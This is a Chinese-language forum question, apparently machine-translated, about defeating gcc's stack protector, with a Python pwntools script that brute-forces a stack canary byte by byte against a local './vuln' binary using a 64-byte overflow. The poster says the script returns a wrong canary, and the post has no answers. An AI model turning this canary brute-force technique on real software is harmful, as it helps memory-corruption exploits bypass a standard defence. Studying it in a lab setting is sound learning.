gcc实现了一个堆栈保护器,以保护程序缓冲区溢出。我想知道,是否有可能(以及如何)利用此漏洞并运行缓冲区溢出。我创建了一个简单的python脚本,该脚本应该可以使金丝雀更加暴力:
from pwn import *
import os
canary = ""
byte = 0x00
def brute():
global canary
global byte
while byte != 0xff:
p = process("./vuln")
p.sendline("A"*64 + canary + chr(byte))
reply=p.recvall()
if "***" in reply:
byte += 1
else:
canary += chr(byte)
byte = 0x00
break
brute()
brute()
brute()
brute()
print "Canary: \\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
结果是:Canary: \x0a\x00\x00\x00
这显然不是金丝雀。
我用来破解的二进制文件:
目前没有回答
相关问题 更多 >
编程相关推荐